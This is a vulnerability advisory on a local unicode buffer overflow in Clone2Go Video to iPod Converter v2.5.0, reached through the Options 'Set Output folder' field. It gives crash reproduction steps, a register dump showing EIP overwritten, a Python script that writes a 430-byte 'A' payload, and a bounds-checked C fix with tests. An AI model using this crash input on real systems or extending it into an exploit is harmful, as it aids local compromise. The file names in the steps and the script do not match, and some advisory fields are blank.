A classic local unicode buffer overflow vulnerability has been discovered in the official Clone2Go Video to iPod Converter v2.5.0 software. The vulnerability allows local attackers to gain higher system or access privileges by exploiting a classic unicode buffer overflow.
Local attackers with a low-privilege system user account or restricted system privileges are able to compromise the local system by exploiting this classic unicode buffer overflow vulnerability. The local attacker copies a string of a specific byte size into the Set Output folder input of the Options dialog to overflow the process and overwrite registers such as ECX, EBX or EIP. This allows the local attacker to take over the system process of the software client and compromise the local system/server.
[+] Menu > Edit > Options > Set Output folder (Input)
Product & Service Introduction:
Video to iPod Converter is a powerful and easy-to-use iPod video conversion software tool for Apple iPod fans. With this video converter for iPod, you can convert videos in almost any popular video format, including AVI, WMV, ASF, MOV, MP4, RM, RMVB, FLV, MKV, AVS, MPG, VOB for playback on the new iPod touch, iPod classic, iPod nano 5G with camera.
(Copy of the Vendor Homepage: http://www.clone2go.com/)
Date of Discovery:
Solution – Fix & Patch:
Restrict the Set Output folder input by size and allocate the memory accordingly, so that interaction with the vulnerable input field can no longer overflow the process.
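As an added illustration of the fix described above (example code written for this advisory, not Clone2Go's own source): the 00410041 values in the register dump below are the UTF-16 encoding of two 'A' characters, which is why the advisory calls this a unicode overflow, so the input arrives as a wide string and the length check must count UTF-16 code units. MAX_OUTPUT_PATH (260, mirroring the Windows MAX_PATH convention), the global destination buffer and all function names are assumptions for the example; the 430-character test input mirrors the advisory's PoC.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>

/* Assumed limit for the output-folder path, in UTF-16 code units; it
 * mirrors the Windows MAX_PATH convention (260) and is not a value
 * taken from the Clone2Go binary. */
#define MAX_OUTPUT_PATH 260

/* Fixed-size destination, the kind of buffer the crash in the advisory
 * implies the product copies the dialog input into. */
static wchar_t g_output_folder[MAX_OUTPUT_PATH];

/* Length of `s` in code units, never scanning more than `limit` units,
 * so an oversized or unterminated input cannot run past the bound
 * (same contract as wcsnlen, written out to stay portable). */
static size_t bounded_wlen(const wchar_t *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != L'\0')
        n++;
    return n;
}

/* Hardened setter: validates the length before any copy. Returns 1 and
 * stores the path on success; returns 0 and leaves the stored path
 * untouched when the input is NULL, empty, or too long to fit together
 * with its terminator. */
int set_output_folder(const wchar_t *input)
{
    if (input == NULL)
        return 0;
    size_t len = bounded_wlen(input, MAX_OUTPUT_PATH);
    if (len == 0 || len >= MAX_OUTPUT_PATH)
        return 0;
    memcpy(g_output_folder, input, (len + 1) * sizeof(wchar_t));
    return 1;
}

const wchar_t *get_output_folder(void)
{
    return g_output_folder;
}

/* Constructed test input modelled on the advisory's PoC: 430 'A'
 * characters, well past the limit, so the setter must refuse it. */
int oversized_input_is_rejected(void)
{
    static wchar_t poc[431];
    for (size_t i = 0; i < 430; i++)
        poc[i] = L'A';
    poc[430] = L'\0';
    return set_output_folder(poc) == 0;
}

/* A realistic folder path (constructed) is accepted and stored verbatim. */
int normal_path_is_accepted(void)
{
    const wchar_t *path = L"C:\\Users\\Public\\Videos";
    return set_output_folder(path) == 1
        && wcscmp(get_output_folder(), path) == 0;
}

/* Exact boundary: 259 units plus terminator fit; 260 units do not. */
int boundary_is_enforced(void)
{
    static wchar_t buf[MAX_OUTPUT_PATH + 1];
    for (size_t i = 0; i < MAX_OUTPUT_PATH; i++)
        buf[i] = L'B';
    buf[MAX_OUTPUT_PATH] = L'\0';       /* 260 units: must be rejected */
    int too_long = set_output_folder(buf) == 0;
    buf[MAX_OUTPUT_PATH - 1] = L'\0';   /* 259 units: must be accepted */
    int fits = set_output_folder(buf) == 1;
    return too_long && fits;
}

int main(void)
{
    printf("oversized rejected: %d\n", oversized_input_is_rejected());
    printf("normal accepted:    %d\n", normal_path_is_accepted());
    printf("boundary enforced:  %d\n", boundary_is_enforced());
    return 0;
}
```

The point of the bounded length scan is that the check itself must not trust the input: computing the length with an unbounded wcslen on an attacker-controlled string only moves the problem, whereas counting against the destination size and refusing anything that does not fit with its terminator closes the overflow at the only place it can occur.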
Risk Level:
Proof of Concept (PoC):
The local buffer overflow vulnerability can be exploited by local attackers with a restricted system user account and without user interaction. For a security demonstration, or to reproduce the issue, follow the information and steps provided below.
Manual steps to reproduce the vulnerability ...
1. Install the software and start the client
2. Copy the AAAA...string from bof.txt to the clipboard
3. Run VideoConverter.exe
4. Go to Menu > Edit > Options > Set Output folder (Input)
5. Paste the AAAA....string into the input and click Open
6. A messagebox opens, click OK
7. The software reliably crashes or shuts down
8. Successful reproduction of the local buffer overflow vulnerability!

--- Registers ---
EAX 8B368BC6
ECX 00410041 VideoCon.00410041 <--- Overwrite
EDX 76F16CCD ntdll.76F16CCD
EBX 00410041 VideoCon.00410041 <--- Overwrite
ESP 00123600
EBP 00123628
ESI 8B368BC6
EDI 00000000
EIP 00410041 VideoCon.00410041 <--- Overwrite

--- Code Python ---
#!/usr/bin/python
# Writes the PoC payload (430 'A' bytes) to poc.txt for pasting into the
# Set Output folder input
buffer = "\x41" * 430
poc = buffer
with open("poc.txt", "w") as f:
    f.write(poc)
print("POC Created by ZwX")
print(" Email: email@example.com")